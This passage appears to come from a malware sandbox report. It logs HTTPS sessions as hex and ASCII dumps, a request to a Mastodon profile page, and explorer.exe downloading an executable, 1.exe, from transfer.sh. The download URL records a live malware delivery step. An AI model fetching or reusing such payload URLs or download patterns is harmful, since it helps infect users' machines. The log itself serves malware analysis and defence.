                                                                                                                                  2022-01-11 22:39:07 UTC3004INData Raw: fb b1 f5 a0 3a 2c 9d 4c c1 18 33 54 3b e9 0f 00 fd 3b 1d 0b 1c 92 95 ce fa 83 30 a2 ad 63 09 96 d9 1e a2 e4 68 31 4f d3 55 ec 8b 68 08 23 b6 55 b0 ba 07 ee 2c e9 46 fe e2 26 f8 65 eb 8b c4 82 9d 42 ee 67 77 ba ed 19 39 ea 74 81 a3 44 e3 11 2c 57 05 36 9b 9c bb 65 76 ab a1 16 34 f8 07 45 e2 f2 89 63 39 c9 ae 70 8f 2a 2d 1c 6c 0d 6e c1 fc af 6b b9 75 a9 06 d3 4b a9 49 6e 3b c9 d7 c3 66 c0 98 40 95 5e d7 6e ac 21 e7 b4 3b 06 6f 51 a3 9a 7b 4c 4c 4c 2b 99 d2 12 06 77 7b 0c 46 6e ee ed 5f ec 2e 31 24 f5 ad 11 d6 46 ae 63 50 12 cd 65 d1 18 ed a4 97 d6 da 84 06 f4 2b c3 40 18 a9 e2 01 5d 28 7e 2d e8 e1 4f 9b a1 c8 42 17 d9 03 0c 33 2b 4b a5 b5 d1 62 14 01 2c 20 49 17 80 ca f7 6f 66 e4 81 1a 95 18 db 5a 64 17 6c bc 7d 01 a9 40 f4 a4 8a 60 ad 9c 14 3e 0b 32 22 7f
                                                                                                                                  Data Ascii: :,L3T;;0ch1OUh#U,F&eBgw9tD,W6ev4Ec9p*-lnkuKIn;f@^n!;oQ{LLL+w{Fn_.1$FcPe+@](~-OB3+Kb, IofZdl}@`>2"
                                                                                                                                  2022-01-11 22:39:07 UTC3020INData Raw: cb 0e 4f ae db b0 3b e6 54 85 ad 6d 1f c7 b5 ce 7b 83 06 bd 90 e5 cc 43 31 58 56 dc 2c c0 b0 88 25 9d c7 21 fd 0c 06 44 38 8b 26 67 31 37 64 ea 5c 19 19 d3 2f 0f 62 7b 8d f5 f2 06 c1 89 d8 5c d5 3a f5 61 1b 2c 8f 4a 6e b1 65 0e 71 09 6d 2e d0 cb a7 84 01 21 43 f9 c9 34 2f 36 91 88 ef 6c 70 a6 71 ad ed a4 7d dc 92 97 6a eb 2e 1e db 50 65 1d df a8 98 77 dc ea 8f 9a 44 b7 57 75 5f 39 c2 f9 96 d9 0e be b6 1f 9b 9b cb ca d9 0c f5 3a 92 88 9e 32 31 59 ba 78 d5 39 71 86 f2 44 f1 70 56 c8 1e 07 84 91 b6 03 35 be b9 1f ad 37 cc bd e6 bb 7e 0b 22 b4 c0 97 69 45 aa 3a 20 bb 55 d1 c7 7e ee 0a 77 7f 99 80 5c 5b af 03 78 fb 08 1d c9 07 fb b0 9f d1 1b b4 79 24 1e 97 16 eb 7f 22 e8 f1 1d 8b 45 33 88 a6 08 eb 23 fe 55 eb e9 06 cd 91 18 f3 1a f9 43 80 a3 9c 8c c4 32 9d ff
                                                                                                                                  Data Ascii: O;Tm{C1XV,%!D8&g17d\/b{\:a,Jneqm.!C4/6lpq}j.PewDWu_9:21Yx9qDpV57~"iE: U~w\[xy$"E3#UC2
                                                                                                                                  2022-01-11 22:39:07 UTC3036INData Raw: da 63 76 9d 89 f5 5b 68 71 73 11 01 bb c7 13 8e 78 ef 0a 9e db 1d 08 16 0e b2 e4 95 e1 36 9f 2c 26 b2 29 43 e2 87 9e 79 a6 d9 8a 23 8a 31 f9 af 92 c5 83 f6 fd c9 37 5b 1c 71 68 40 69 61 90 75 60 e6 36 56 28 30 23 e9 db b4 58 c7 43 e2 31 eb d6 29 15 45 ed 8c e9 16 7f 18 17 4a 06 5d 6c 46 db 33 63 c4 77 42 66 ff b7 9c 2f a1 23 fc 53 9a 1d be 5d 58 e1 08 fe e3 da e8 01 4a da 93 38 79 60 40 76 a8 17 16 5f 99 a9 e1 de ea b6 b7 12 14 c7 70 2b 6a 4c 54 f8 59 fb 42 19 fb 4a 59 e5 a5 be fa 7a 1f aa 42 c0 39 32 c0 83 ff 0b 28 af d1 7b 1f fe d2 67 ba 8f 94 9d 9b d9 23 1c 02 e9 01 3b ef ff 27 c5 16 f9 c3 40 87 45 01 0a 24 df 7b 10 24 30 d5 36 46 e2 34 d5 d8 00 63 da 37 5b 13 28 fa 25 73 a2 6a 78 83 f8 da fb 6c b4 d1 ce e7 e6 4a 6b 0c f3 e4 79 5b e2 02 17 64 c3 98 96
                                                                                                                                  Data Ascii: cv[hqsx6,&)Cy#17[qh@iau`6V(0#XC1)EJ]lF3cwBf/#S]XJ8y`@v_p+jLTYBJYzB92({g#;'@E${$06F4c7[(%sjxlJky[d
                                                                                                                                  2022-01-11 22:39:07 UTC3052INData Raw: cd ec 1d af 50 6d 3d 59 3b 92 8d 21 2a 14 f7 6f 0d f1 87 33 05 1c e6 df 4f 2c 24 f9 c7 78 e2 fd 1a bc d6 f5 56 02 36 30 47 a5 e7 fb 99 cd 95 1d 68 f5 79 fe 60 57 d7 3d 20 57 30 dd fa 3d cb 00 dc 26 68 ac 36 be eb 90 a2 56 8d 27 18 2a 16 71 c8 a5 07 eb 49 1c 6b 83 d2 2a 01 d4 0c 71 c2 15 ba bd b1 36 24 99 d1 76 ec 50 cc 52 38 aa b0 52 44 35 6e d0 38 7a 76 65 a8 98 60 b4 b9 14 66 1f ee 75 a3 47 64 19 0d 61 c9 fd 96 92 b4 4c 10 90 d5 d9 43 39 83 31 df c7 0d bb f7 65 98 d1 97 2f ec 0e 4a d9 8c db ca 56 20 c3 c9 41 cf 98 30 db 00 a7 c8 66 e2 e5 b2 a8 f0 b9 25 4e 8e d8 8f be c2 b1 cd ae d5 52 25 93 74 3b 50 36 a4 e3 20 97 bd eb 05 4b c7 cf 4b 75 f4 4e 82 7d b7 bc c7 82 c5 5a 84 29 10 97 4b 61 21 73 da f2 fd b4 d7 77 7c c2 e5 d7 33 22 db 67 0a 21 46 00 11 13 25
                                                                                                                                  Data Ascii: Pm=Y;!*o3O,$xV60Ghy`W= W0=&h6V'*qIk*q6$vPR8RD5n8zve`fuGdaLC91e/JV A0f%NR%t;P6 KKuN}Z)Ka!sw|3"g!F%
                                                                                                                                  2022-01-11 22:39:07 UTC3068INData Raw: 89 b8 dc db be 91 0e 28 b4 96 93 49 57 72 80 f3 15 16 cf da 0c 6c d3 7b f0 d6 58 bf 90 67 1e 1a 05 cf 5f 2a fd c9 ee 5d 78 7d 43 0f 28 99 07 c3 e3 96 af fd 70 f0 6b 53 1c c8 e8 91 4b 09 2c e1 4a 25 c9 74 50 3f 10 26 dc a7 0a 4a 31 91 79 19 a8 62 54 f1 55 d8 6c e1 1d a7 45 d5 87 26 7e 5a 25 3d f2 5c 33 f6 ee c3 21 69 c0 32 9a 9d 8d ac 95 97 f3 a0 17 62 75 41 64 3d b7 4b 16 2d 12 91 c8 32 cc d6 9b 58 a3 e2 05 2e 12 cb f6 70 ed 10 13 b2 ac 32 73 17 06 27 da 94 1d dc fa 8d e9 ef de 99 69 ee 62 8b e6 45 55 3d ae 25 db 22 60 c8 d0 42 a2 54 86 26 97 38 71 49 a4 15 fb 04 e6 77 86 7b 44 1c 09 d0 4d 87 5d b1 44 53 1d ee 6f b0 99 c9 30 13 6a 9e 4d f0 50 b5 54 bf 3d f2 92 b8 59 45 72 c4 5f b7 e4 a9 6a 09 cb a2 bb 5d ef a3 5d de 36 1a a0 a9 90 ba b8 44 02 f8 41 77 aa
                                                                                                                                  Data Ascii: (IWrl{Xg_*]x}C(pkSK,J%tP?&J1ybTUlE&~Z%=\3!i2buAd=K-2X.p2s'ibEU=%"`BT&8qIw{DM]DSo0jMPT=YEr_j]]6DAw
                                                                                                                                  2022-01-11 22:39:07 UTC3084INData Raw: 44 7b 14 bb a1 b1 d1 65 cd 0e d3 ed 1d e1 59 a5 61 8f 46 bb 2e e4 8e 6e 45 f4 cb 2e 63 e7 23 3b f5 4f e3 0f 39 03 d6 e5 9b 90 87 24 0e c4 3d 71 2b 38 9a fa ac 33 65 53 6d d8 8e f3 6a 2a 32 ab 6b 95 a4 3d 17 2f bc de 66 3c 96 a1 c7 db a4 28 9f 49 4f 75 1b a3 0f 84 c2 08 21 f7 4c ae 15 b8 88 0f fc eb 03 db 12 51 8c fb a4 e8 e2 99 93 60 db ca 88 16 48 3d fb 8e 5d c8 be bd ab 2f a4 bd 24 81 cb f6 17 bb 15 5b 47 34 08 cf f0 43 4c 7a b4 3b 9c f7 98 e6 91 06 df 55 6d 38 7d 11 f8 5a aa b7 a5 13 5b f8 cd cb e5 be e0 6d 6c 97 a6 85 04 85 64 a2 44 41 d4 2c c9 9a 40 76 09 6d 68 00 fa fe 2f b6 a7 7a 0a 93 40 9a bb 0c 68 0e 97 99 d0 f9 4b d1 49 6e 8f 9b cc a3 a4 c8 f7 b1 2f 6b 33 36 af 02 6a 75 ad 21 26 7b b0 95 6b fe 5d 23 6d 07 19 67 ae c8 38 33 e6 d1 e4 ae e5 a0 4f
                                                                                                                                  Data Ascii: D{eYaF.nE.c#;O9$=q+83eSmj*2k=/f<(IOu!LQ`H=]/$[G4CLz;Um8}Z[mldDA,@vmh/z@hKIn/k36ju!&{k]#mg83O
                                                                                                                                  2022-01-11 22:39:07 UTC3100INData Raw: 39 63 a2 d3 c1 18 73 48 d6 f9 25 25 8a 14 ca 4b 9f f5 df a1 72 2d 26 41 d8 f7 0d 91 06 f0 78 f0 1b 73 af 55 0c cb e1 3c b8 29 da 2d cb 3d a0 cb a1 ad 82 63 da cf 2c 23 9a fa b5 d0 dc 07 b5 7a 84 14 bc 45 cd 64 09 ba 3b d6 c8 7b 57 02 34 10 c7 40 70 9b 09 c2 66 07 38 21 d4 71 f2 8c 2e f5 44 3d ac 01 71 35 c2 1f a9 85 02 e2 dd bb 6d 08 cb 5a ab b6 c4 b8 e1 7c fb 2b e8 62 3a d3 d4 1b dc e4 e2 20 8c f7 fe ba 1e bf cc 51 7d fb 72 e2 e5 1e 60 ce 03 ac 95 38 83 aa d7 e4 c1 df d9 2d 88 9a b7 f6 58 95 0b ae d0 dd be 90 d0 23 d7 bb 96 e2 67 b3 00 f5 c3 c7 84 21 73 e6 be ea b0 2a e3 24 e2 ba 79 31 92 7f 24 9b cf 5e ea 84 9f 22 e7 d9 01 78 b5 42 f0 e8 cb 18 1c 68 8c 5f ba a3 5d f9 61 12 fa f9 b8 d5 9b ab 46 35 24 2f b2 21 91 55 8c 07 fc 2c 24 c6 2d 62 9d e7 02 b6 9b
                                                                                                                                  Data Ascii: 9csH%%Kr-&AxsU<)-=c,#zEd;{W4@pf8!q.D=q5mZ|+b: Q}r`8-X#g!s*$y1$^"xBh_]aF5$/!U,$-b
                                                                                                                                  2022-01-11 22:39:07 UTC3116INData Raw: bd ea 4e 3f 20 36 e1 02 f2 3b e7 9c 39 d1 80 f7 dd ce 60 88 43 de 9f e4 14 3f 93 90 7a 80 c4 f7 fb d2 ef dc b8 a9 58 f4 81 43 f9 05 48 e1 a2 91 c0 61 85 c3 7f 9f d6 9f bf ee 99 67 79 1f 1c c7 4a d2 13 f9 58 ea 7f e3 10 d3 e4 43 32 22 f8 04 16 57 67 2e 5a 91 09 79 ab cf 97 77 57 79 c1 43 dd 1c 85 4b c5 96 97 ae 3a b0 db 08 f3 fa 0a 33 f6 90 a6 8e ed 87 29 7c b8 92 34 53 bd e5 a1 86 40 8d f5 47 d1 6a 50 06 ef 5f ff c0 01 4b b5 32 95 df 6c d9 eb 15 de 54 91 f6 90 ed 9a 8c e6 c2 26 5d 25 60 d0 9d 54 05 dc 45 93 e6 aa 30 9f 26 4d a5 91 78 fe b3 64 a8 b3 f1 6b b0 2f 97 01 5f 03 0c 99 d1 9f fe d5 c6 96 eb 7d 97 e9 fd 77 5f da 90 b8 d1 42 5e a2 1d 8c 1b 6c 3c a0 aa b6 57 e5 c3 2d b5 2a 59 78 09 9f 7e a5 2c 3c 2e c0 68 80 96 e0 a8 be 92 dd c0 7c 9b 0f ef 8b 83 68
                                                                                                                                  Data Ascii: N? 6;9`C?zXCHagyJXC2"Wg.ZywWyCK:3)|4S@GjP_K2lT&]%`TE0&Mxdk/_}w_B^l<W-*Yx~,<.h|h
                                                                                                                                  2022-01-11 22:39:07 UTC3132INData Raw: bd 1b 97 99 38 0f 2d 3d b4 14 6e 91 14 8f a5 26 87 bc d3 93 29 a6 84 3d 58 0f 2a 6c b1 29 ca 26 d7 e6 45 37 88 a2 17 f4 a8 03 17 ab d2 ef 05 c5 0c 66 96 c7 02 bb 8e cb af 9a 8d b5 88 73 14 a8 4e a6 f0 3e bf 83 07 13 80 2d e2 ec a3 b4 02 a5 e0 1e f9 5d 2a 60 88 42 c7 31 bc d9 96 59 a4 48 e4 1b cf 98 77 b7 a1 ec a9 7f ec 24 cd 4b 0a 38 99 0f fe 75 5f 3e 39 37 87 6a e4 02 73 44 fe 73 e8 76 d0 78 50 db 1f 05 90 02 b3 72 32 60 8c 49 db f8 55 a9 a0 b7 80 b9 cb 69 e8 b8 4d 54 ee 9b be 80 4b 04 80 f8 60 c3 d2 1a 38 50 ff 23 1a b4 46 2d 2d a9 b0 dc 3c b7 27 7e 57 5d 07 c1 cd 69 bd 23 09 dc 11 b5 90 5f e1 64 8b 2b ec 6c f0 46 f4 72 16 ff 0d 1b af 06 1d ec 97 81 2d 83 62 e8 60 7b c4 15 15 7f 97 ef 2b b9 3c 28 55 4d dd a2 eb 9a f2 ed d2 9d 31 16 92 96 7c d3 c1 1e 54
                                                                                                                                  Data Ascii: 8-=n&)=X*l)&E7fsN>-]*`B1YHw$K8u_>97jsDsvxPr2`IUiMTK`8P#F--<'~W]i#_d+lFr-b`{+<(UM1|T
                                                                                                                                  2022-01-11 22:39:07 UTC3148INData Raw: 5c c6 85 96 b7 55 36 a2 a3 58 1e f3 18 48 f2 2a 16 d5 a8 fe 10 95 fd fa 2b ea ad e6 4f c8 91 16 90 68 52 b3 ce fc 27 6c a7 32 89 6c ff 3d 6b 54 89 54 62 7a 16 6e 01 b8 e8 c2 e2 c3 d4 39 db c7 15 49 bb c5 85 5b 61 df cf 69 6d d9 5b a7 ba d9 8c f0 d1 5b 44 bb 9f 53 ca 78 d0 70 ea 4c c8 45 e8 a3 13 b1 1a 25 7e d4 20 14 e8 d7 f4 ea 40 f4 e9 04 b7 2f 05 cb 42 32 56 f6 5d 5e c2 7f c3 ea b0 ff a7 48 da 10 69 0d 79 7f 12 aa 8b e3 60 ef d9 ac ec fb ee 51 d4 4d 70 76 22 49 81 eb 1a 05 70 61 fb c7 6d 91 e0 87 19 b0 ca 5c 7d ce 51 e3 7c 4a 73 11 be 54 18 29 98 e6 94 ed 62 f8 e3 0a c4 14 1d 93 25 3f ee 28 0d 42 65 bb 69 70 94 42 e1 c6 26 ca 6f 18 00 43 72 46 ec b2 97 33 37 d4 ac 16 ee e5 76 78 b5 c8 fe 50 f0 f9 c6 ea b4 cd be 3c b8 dd fc 61 55 d4 32 41 03 e2 af ad ca
                                                                                                                                  Data Ascii: \U6XH*+OhR'l2l=kTTbzn9I[aim[[DSxpLE%~ @/B2V]^Hiy`QMpv"Ipam\}Q|JsT)b%?(BeipB&oCrF37vxP<aU2A
                                                                                                                                  2022-01-11 22:39:07 UTC3164INData Raw: 22 56 30 80 1b 93 85 e4 93 56 06 07 53 31 06 9f 68 f6 e0 81 3f a6 89 9d 00 84 bc 63 44 94 c6 cd 72 9f 97 32 68 be 81 b2 ac 85 a3 3b 4c 47 7b 65 67 6b 2e 5b 3e f4 76 98 72 c0 ac 72 33 95 70 6e 12 ca c8 11 9e 53 47 1f 89 c3 70 18 45 5b c4 db f6 fb 69 be bd c6 13 05 ac 3c ef a9 38 f0 10 42 b5 cd e9 77 4a 47 b7 ba 00 21 18 59 45 f0 94 a1 bf 82 09 7b 0a 55 1f e3 d9 7b 9b b9 9a d5 62 fc 77 12 65 7b 68 9e 66 13 8a cd 26 bf 08 72 0d 4c b2 c9 10 b1 f2 17 c7 5a 23 72 22 e6 16 d0 b6 e3 54 9f b3 00 12 a9 70 29 d4 75 ac 3c 42 d9 5e 80 46 f7 8e c4 53 f4 a7 cc 04 62 94 5c 29 d8 7b 72 f7 60 ac e2 89 28 db b2 a7 e7 0a bf 26 b3 be 97 f3 33 b0 c2 ae 34 a0 20 d0 44 62 c8 16 28 4e a3 1a 16 a8 47 f8 66 23 88 5f 1a 49 90 b8 32 5a 98 b8 66 0f e5 a2 06 7d 7a 87 cb a3 22 bf 66 09
                                                                                                                                  Data Ascii: "V0VS1h?cDr2h;LG{egk.[>vrr3pnSGpE[i<8BwJG!YE{U{bwe{hf&rLZ#r"Tp)u<B^FSb\){r`(&34 Db(NGf#_I2Zf}z"f
                                                                                                                                  2022-01-11 22:39:07 UTC3180INData Raw: 7b 04 e0 05 9f 40 3b d1 12 3c bc f2 e8 95 d0 ef 27 65 b1 20 78 94 58 87 ad a3 a6 72 ce f9 cb 55 24 5c 7d a8 ab 0b fe 1b a6 cb 32 c4 2e 53 5c e9 70 df 53 be e8 0e 0c e0 10 4b b9 a4 5e e1 f1 29 c1 fa ba 27 96 d8 3c 80 3c a7 75 f0 68 25 29 9e 51 f0 9f 22 2d c7 e9 65 12 fb ea db 8e 6e f4 23 ee 78 d6 bd 1e 7e 0f 1e be 8a b3 41 7b 41 2f 37 09 c0 9d ec 1c ba 42 c4 e4 74 ff 43 c7 d9 2d 55 b2 70 84 51 b0 eb f5 7f 0b de ac 79 78 a7 3b c4 08 eb 45 86 66 01 16 ad f9 7d 86 42 ea f4 1b ca 0e 96 a7 0f e8 19 5e 0f d0 f5 f6 f2 76 b0 6e 2e 91 50 0d 59 70 f1 30 dc c3 b6 51 a3 b2 b8 10 c8 6e 2e ac 58 79 32 c5 d9 6a 68 b2 9f e2 2b 9e f8 83 a4 6d 99 95 16 fc 62 20 0a 1e ad 18 38 54 01 4f fb b7 70 56 9c 89 36 47 e2 a8 10 ab ed fb 28 72 77 9d 35 40 fd 50 a0 94 aa e3 27 cb cf 6c
                                                                                                                                  Data Ascii: {@;<'e xXrU$\}2.S\pSK^)'<<uh%)Q"-en#x~A{A/7BtC-UpQyx;Ef}B^vn.PYp0Qn.Xy2jh+mb 8TOpV6G(rw5@P'l


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.549890149.28.78.238443
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:39:08 UTC3189OUTGET /@banda5ker HTTP/1.1
                                                                                                                                  Host: noc.social
                                                                                                                                  2022-01-11 22:39:09 UTC3189INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:08 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Server: Mastodon
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  Link: <https://noc.social/.well-known/webfinger?resource=acct%3Abanda5ker%40noc.social>; rel="lrdd"; type="application/jrd+json", <https://noc.social/users/banda5ker>; rel="alternate"; type="application/activity+json"
                                                                                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                                                                                  Cache-Control: max-age=0, public
                                                                                                                                  ETag: W/"622b355cfe251d074a37d5abf209368a"
                                                                                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://noc.social; img-src 'self' https: data: blob: https://noc.social; style-src 'self' https://noc.social; media-src 'self' https: data: https://noc.social; frame-src 'self' https:; manifest-src 'self' https://noc.social; connect-src 'self' data: blob: https://noc.social https://noc.social wss://noc.social; script-src 'self' https://noc.social; child-src 'self' blob: https://noc.social; worker-src 'self' blob: https://noc.social
                                                                                                                                  Set-Cookie: _mastodon_session=LY0d9RoqMIbl8Tx2QaMPibFlh3slIeVsHf1pTQct83XMdkipIc%2FLRUOIU2yMIJZutyov1iy%2BZapaxC2szv3goKavB86mSDAKqGgizoXIE5fXJW5v%2Bz%2FIXSIJvnJUQ7kcnq3SYyPovjXZv8zJeX4yCuuQy4X%2BKSvyIf9cAc4tI9pEqiEnjeh0%2FsJdGEaSApXZ7dnx4KiPvabOV5U%3D--bhjiA%2BiFbm8H%2FuEO--DalFBTqC1eK0aIkCnxu%2BXQ%3D%3D; path=/; secure; HttpOnly
                                                                                                                                  X-Request-Id: 14b94ff5-61c9-4afd-bd8e-554c07d2c259
                                                                                                                                  X-Runtime: 0.052877
                                                                                                                                  X-Cached: MISS
                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                  2022-01-11 22:39:09 UTC3191INData Raw: 33 63 36 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                                                                                  Data Ascii: 3c67<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                                                                                  2022-01-11 22:39:09 UTC3205INData Raw: 33 31 32 35 2d 32 37 2e 37 38 36 32 35 20 30 2d 31 30 2e 39 33 37 35 20 33 2e 34 39 36 32 35 2d 32 30 2e 31 20 31 30 2e 36 33 31 32 35 2d 32 37 2e 36 33 37 35 20 37 2e 31 33 35 2d 37 2e 35 33 37 35 20 31 35 2e 39 34 37 35 2d 31 31 2e 33 38 20 32 36 2e 32 39 38 37 35 2d 31 31 2e 33 38 20 31 30 2e 33 35 32 35 20 30 20 31 39 2e 31 36 35 20 33 2e 38 34 32 35 20 32 36 2e 33 20 31 31 2e 33 38 20 37 2e 31 33 35 20 37 2e 35 33 37 35 20 31 30 2e 37 37 31 32 35 20 31 36 2e 38 34 38 37 35 20 31 30 2e 37 37 31 32 35 20 32 37 2e 36 33 37 35 20 30 20 31 30 2e 39 33 37 35 2d 33 2e 36 33 36 32 35 20 32 30 2e 32 34 38 37 35 2d 31 30 2e 37 37 31 32 35 20 32 37 2e 37 38 36 32 35 2d 37 2e 31 33 35 20 37 2e 35 33 38 37 35 2d 31 35 2e 38 30 37 35 20 31 31 2e 32 33 32 35 2d 32
                                                                                                                                  Data Ascii: 3125-27.78625 0-10.9375 3.49625-20.1 10.63125-27.6375 7.135-7.5375 15.9475-11.38 26.29875-11.38 10.3525 0 19.165 3.8425 26.3 11.38 7.135 7.5375 10.77125 16.84875 10.77125 27.6375 0 10.9375-3.63625 20.24875-10.77125 27.78625-7.135 7.53875-15.8075 11.2325-2


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.549894144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:39:09 UTC3206OUTGET /get/wP2pzq/1.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: transfer.sh
                                                                                                                                  2022-01-11 22:39:10 UTC3206INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.14.2
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:10 GMT
                                                                                                                                  Content-Type: application/x-ms-dos-executable
                                                                                                                                  Content-Length: 3654656
                                                                                                                                  Connection: close
                                                                                                                                  Content-Disposition: attachment; filename="1.exe"
                                                                                                                                  Retry-After: Tue, 11 Jan 2022 23:39:14 GMT
                                                                                                                                  X-Made-With: <3 by DutchCoders
                                                                                                                                  X-Ratelimit-Key: 127.0.0.1,102.129.143.64,102.129.143.64
                                                                                                                                  X-Ratelimit-Limit: 10
                                                                                                                                  X-Ratelimit-Rate: 600
                                                                                                                                  X-Ratelimit-Remaining: 8
                                                                                                                                  X-Ratelimit-Reset: 1641940754
                                                                                                                                  X-Remaining-Days: n/a
                                                                                                                                  X-Remaining-Downloads: n/a
                                                                                                                                  X-Served-By: Proudly served by DutchCoders
                                                                                                                                  2022-01-11 22:39:10 UTC3207INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 7e bf dd 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 aa 0a 00 00 bc 02 00 00 00 00 00 00 10 00 00 00 10 00 00 00 c0 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 5d 00 00 04 00 00 f7 13 38 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL~a@]8
                                                                                                                                  2022-01-11 22:39:10 UTC3222INData Raw: 72 46 5f 44 2c 98 fa dc 62 77 1a 22 a2 6d c8 52 c6 cd 47 a8 9a db 87 58 1c 3e 6a 35 48 5b 81 f6 19 07 f4 e8 d6 ab ff 13 77 13 83 2b 05 1c ed 38 46 2b 1d dc 62 61 d8 98 f6 b5 f5 13 bf 57 63 f4 a5 c1 44 ef 6b c8 39 2f f0 33 3d e0 e7 d5 17 3c 51 e1 71 75 da 2b 0d f3 ba f4 4f 8a 0f da 40 a8 35 62 b0 13 bc 08 6a 71 dc 67 2e d7 98 fc 53 fc a9 77 ac 18 06 1b 11 41 e3 bf ff 2e 4a 3f 64 a1 6d 5b bd fa e6 fa 49 ce 96 cc 56 8a 2b a7 38 d1 1c f2 9b 14 ba 0e c4 74 79 b7 c2 77 d3 4a 71 0a 8b 7f 87 76 00 eb 74 83 7f c3 5f 9b 76 6a 11 6b 93 e6 4e f7 83 63 15 e9 95 b1 a0 2b dc 2e 13 16 f0 4e 90 9d dc 7b bd fd 12 e4 1b 4d 0a 4d d3 8f 81 67 a2 f0 73 85 1d 1b d0 51 8f cf 06 ea 51 17 b5 35 67 9f 99 0c 42 88 16 a2 87 72 f3 b1 10 f1 3d 7c 25 86 7f 28 ab 7c 8f cd 57 10 36 e0 f4
                                                                                                                                  Data Ascii: rF_D,bw"mRGX>j5H[w+8F+baWcDk9/3=<Qqu+O@5bjqg.SwA.J?dm[IV+8tywJqvt_vjkNc+.N{MMgsQQ5gBr=|%(|W6
                                                                                                                                  2022-01-11 22:39:10 UTC3238INData Raw: 59 a1 c8 cc 0d 7d d7 6e 01 c7 b6 1c eb b4 cd 89 6c 8b f7 c1 c9 4d 7b b7 ff c7 38 65 71 36 ec 02 22 3d 77 e7 0a d1 10 6f a4 99 06 20 c9 0f 58 99 34 6a 4a 80 c6 56 e0 da 0f d9 3f 8f 82 fb 92 8d 3b 37 3d 36 d8 58 37 72 3f fd 62 7d ff 57 67 a5 25 a4 d2 c1 79 05 97 7c e1 72 b8 5b 1f ed 25 64 6c ea 2c fa 8c 84 06 e5 9c 46 76 03 a9 c9 17 bd 3a b4 78 ed 49 13 bf 85 b8 9a 29 a0 3a 4f 46 5a c8 8b 94 f0 5f a2 d3 e5 b8 5a 0d 59 3f fb 3b 8b da 6c 00 93 de 94 87 ab 79 92 92 2b 35 d6 72 90 a0 e7 b0 6c a5 1e a7 96 34 19 51 40 f3 4a 96 89 50 82 81 f1 0b 53 04 0d 63 6b 8b 98 0b 43 a9 36 8f fe c4 c7 4e 29 90 e7 37 10 56 ba 3b d2 0c bf 9b 14 ac 55 18 a2 be 84 e7 6d 40 90 fb d4 6e 24 51 ae fa ba aa a0 97 2b a6 b9 0f 08 19 4a 57 30 35 0c 6d ef 4f 1a 9f 76 d5 5c 12 69 6b 5a b3
                                                                                                                                  Data Ascii: Y}nlM{8eq6"=wo X4jJV?;7=6X7r?b}Wg%y|r[%dl,Fv:xI):OFZ_ZY?;ly+5rl4Q@JPSckC6N)7V;Um@n$Q+JW05mOv\ikZ
